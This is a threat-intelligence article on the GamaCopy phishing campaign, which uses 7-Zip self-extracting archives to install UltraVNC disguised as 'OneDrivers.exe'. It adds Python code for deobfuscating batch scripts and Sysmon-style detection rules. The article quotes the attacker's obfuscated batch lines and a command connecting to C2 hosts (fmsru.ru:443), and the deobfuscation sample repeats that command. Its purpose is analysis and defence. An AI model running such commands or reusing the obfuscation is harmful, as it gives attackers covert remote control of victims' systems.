A sophisticated malware campaign has been uncovered, leveraging 7-Zip self-extracting archives and the UltraVNC remote access tool to target Russian-speaking entities.
The operation, attributed to a threat actor dubbed GamaCopy, mimics tactics previously associated with the Kremlin-aligned Gamaredon group.
The attack chain begins with a spear-phishing email containing a self-extracting (SFX) archive created using 7-Zip.
This archive serves as the initial payload, designed to bypass security measures and deliver subsequent malicious components.
Security analysts at the Knownsec 404 Advanced Threat Intelligence team identified that upon execution, the SFX archive unpacks and runs a batch script that performs several key functions:
- Copies a decoy PDF document with military-related content to the victim’s system
- Installs UltraVNC, disguised as “OneDrivers.exe”
- Configures UltraVNC to connect to the attacker’s command and control (C2) server
Infrastructure Analysis
The batch script employs obfuscation techniques to hinder analysis, splitting key strings across randomly named variables that are reassembled at run time:

```batch
@echo off
setlocal enabledelayedexpansion
rem Randomly named variables carry the pieces that later commands concatenate
set qH09C99079b99D4900=%COMPUTERNAME%
set db53P23A03h83Z23e6=4797
rem "Ultr" + "aVNC" rebuild the tool name so it never appears as one string
set rM91V31H31q51V41E3=Ultr
set NX96b26L46A16Y66r6=aVNC
```
This script copies UltraVNC to the system, renames it to “OneDrivers.exe”, and executes it with specific parameters:

```batch
start "" %TEMP%\OneDrivers.exe -autoreconnect -id:%COMPUTERNAME%_SVOD_4797 -connect fmsru.ru:443
```
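To show how this kind of variable-chunking unravels, here is an added Python example (not code from the article or from the Knownsec 404 team) that collects the script's `set` assignments, expands `%VAR%`/`!VAR!` references that the script itself defined, and pulls the C2 host and UltraVNC indicators out of the recovered command lines. The sample script is constructed: its first `set` lines mirror the article's snippet, while the `Z1`/`Z2` variables and the `copy` line are assumptions about how such fragments are typically consumed.

```python
import re
from typing import Dict, List

# Constructed sample. The four obfuscated "set" lines follow the article's
# snippet; Z1/Z2 and the copy line are assumed, not taken from the real script.
SAMPLE_BAT = r"""@echo off
setlocal enabledelayedexpansion
set qH09C99079b99D4900=%COMPUTERNAME%
set db53P23A03h83Z23e6=4797
set rM91V31H31q51V41E3=Ultr
set NX96b26L46A16Y66r6=aVNC
set Z1=One
set Z2=Drivers
copy "!rM91V31H31q51V41E3!!NX96b26L46A16Y66r6!.exe" "%TEMP%\!Z1!!Z2!.exe"
start "" %TEMP%\!Z1!!Z2!.exe -autoreconnect -id:!qH09C99079b99D4900!_SVOD_!db53P23A03h83Z23e6! -connect fmsru.ru:443
"""

SET_RE = re.compile(r'^\s*set\s+"?([^=\s"]+)=(.*?)"?\s*$', re.IGNORECASE)
# %NAME% (normal) and !NAME! (delayed expansion) references
VAR_RE = re.compile(r'[%!]([^%!\s]+)[%!]')
CONNECT_RE = re.compile(r'-connect\s+([A-Za-z0-9.\-]+):(\d+)', re.IGNORECASE)


def expand(text: str, env: Dict[str, str]) -> str:
    """Resolve references to variables the script defined itself.
    Real environment variables (%TEMP%, %COMPUTERNAME%) are left intact so the
    output still reads like the command cmd.exe would run."""
    def sub(m):
        return env.get(m.group(1).upper(), m.group(0))
    prev = None
    for _ in range(10):  # bounded: nested definitions are shallow in practice
        if text == prev:
            break
        prev, text = text, VAR_RE.sub(sub, text)
    return text


def deobfuscate(script: str) -> List[str]:
    """Return the non-'set' lines with every script-defined variable expanded."""
    env: Dict[str, str] = {}
    out: List[str] = []
    for line in script.splitlines():
        m = SET_RE.match(line)
        if m:
            # cmd variable names are case-insensitive, so key on upper-case
            env[m.group(1).upper()] = expand(m.group(2), env)
            continue
        out.append(expand(line, env))
    return out


def extract_indicators(lines: List[str]) -> Dict[str, object]:
    """Pull C2 endpoints and UltraVNC tell-tales from the recovered commands."""
    found: Dict[str, object] = {"c2": [], "autoreconnect": False, "renamed_vnc": False}
    for line in lines:
        low = line.lower()
        for m in CONNECT_RE.finditer(line):
            found["c2"].append(f"{m.group(1)}:{m.group(2)}")
        if "-autoreconnect" in low:
            found["autoreconnect"] = True
        # the tool name only becomes visible once the fragments are joined
        if "ultravnc" in low and any(v in low for v in ("copy ", "ren ", "move ")):
            found["renamed_vnc"] = True
    return found


if __name__ == "__main__":
    recovered = deobfuscate(SAMPLE_BAT)
    print("\n".join(recovered))
    print(extract_indicators(recovered))
```

The recovered last line is exactly the `start` command the article quotes, which is the point of the exercise: once the `set` fragments are joined, the hostname, port and the `_SVOD_4797` identifier fall out as plain strings that can be matched or blocked.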
The campaign utilizes the following command and control servers: `nefteparkstroy.ru:443` and `fmsru.ru:443`.
GamaCopy’s tactics closely resemble those of Core Werewolf (also known as Awaken Likho and PseudoGamaredon), including the use of 7z-SFX files for payload delivery, deployment of UltraVNC for remote access, connection to C2 servers over port 443, and extensive use of batch script obfuscation.
This campaign represents a significant threat to Russian-speaking organizations, particularly those in the defense and government sectors. The use of military-themed lures suggests a focus on espionage and data exfiltration.
Organizations should implement the following measures to protect against this threat:
- Deploy robust email filtering to detect and quarantine suspicious attachments.
- Educate employees on identifying phishing attempts, especially those with military or sensitive themes.
- Implement application whitelisting to prevent unauthorized executables from running.
- Monitor for unexpected network connections, particularly those using remote access tools like UltraVNC.
- Regularly update and patch systems to address known vulnerabilities.
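The monitoring recommendation above can be turned into two concrete telemetry rules. The following is an added Python example (not from the article or the Knownsec 404 team) that runs over constructed, already-parsed Sysmon-style events: rule one flags a process launched with UltraVNC-style switches (`-connect`, `-autoreconnect`, `-id:`, as seen in the article's command line) whose on-disk name does not contain "vnc", which is the renamed-binary pattern; rule two flags any outbound connection made by an executable living under a `Temp` directory. Field names follow Sysmon event IDs 1 (process create) and 3 (network connect); the event contents themselves are made up for the example.

```python
import ntpath
from typing import Callable, Dict, List, Optional

# Constructed events modelled on the article's "OneDrivers.exe" activity,
# plus two benign ones so the rules have something to ignore.
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 1,
     "Image": r"C:\Users\u\AppData\Local\Temp\OneDrivers.exe",
     "CommandLine": r"C:\Users\u\AppData\Local\Temp\OneDrivers.exe -autoreconnect "
                    r"-id:HOST1_SVOD_4797 -connect fmsru.ru:443",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 3,
     "Image": r"C:\Users\u\AppData\Local\Temp\OneDrivers.exe",
     "DestinationHostname": "fmsru.ru", "DestinationPort": 443},
    {"EventID": 1,
     "Image": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe",
     "CommandLine": "OneDrive.exe /background",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3,
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationHostname": "example.org", "DestinationPort": 443},
]

# Switches UltraVNC's viewer/server accept; two or more together is a strong signal
VNC_FLAGS = ("-autoreconnect", "-id:", "-connect")


def is_temp_path(path: str) -> bool:
    """True when the executable sits under any ...\\Temp\\ directory."""
    return "\\temp\\" in path.lower()


def rule_renamed_vnc(ev: Dict) -> Optional[str]:
    """Process-create event with VNC switches but a non-VNC file name."""
    if ev.get("EventID") != 1:
        return None
    cmd = ev.get("CommandLine", "").lower()
    hits = [f for f in VNC_FLAGS if f in cmd]
    if len(hits) < 2:
        return None
    exe = ntpath.basename(ev.get("Image", "")).lower()
    if "vnc" in exe:
        return None  # an undisguised VNC binary is a policy question, not this rule's
    return f"VNC switches {hits} from non-VNC image {exe}"


def rule_temp_outbound(ev: Dict) -> Optional[str]:
    """Network-connect event originating from a binary in a Temp directory."""
    if ev.get("EventID") != 3:
        return None
    image = ev.get("Image", "")
    if not is_temp_path(image):
        return None
    return (f"outbound {ev.get('DestinationHostname')}:{ev.get('DestinationPort')} "
            f"from Temp binary {ntpath.basename(image)}")


RULES: List[Callable[[Dict], Optional[str]]] = [rule_renamed_vnc, rule_temp_outbound]


def triage(events: List[Dict]) -> List[Dict]:
    """Apply every rule to every event; return one alert per (event, rule) hit."""
    alerts: List[Dict] = []
    for ev in events:
        for rule in RULES:
            reason = rule(ev)
            if reason:
                alerts.append({"rule": rule.__name__, "image": ev.get("Image"), "reason": reason})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Port 443 is deliberately not a condition in either rule: the campaign uses it precisely because it blends into normal traffic, so the discriminators are the switch combination and the launch location rather than the destination port.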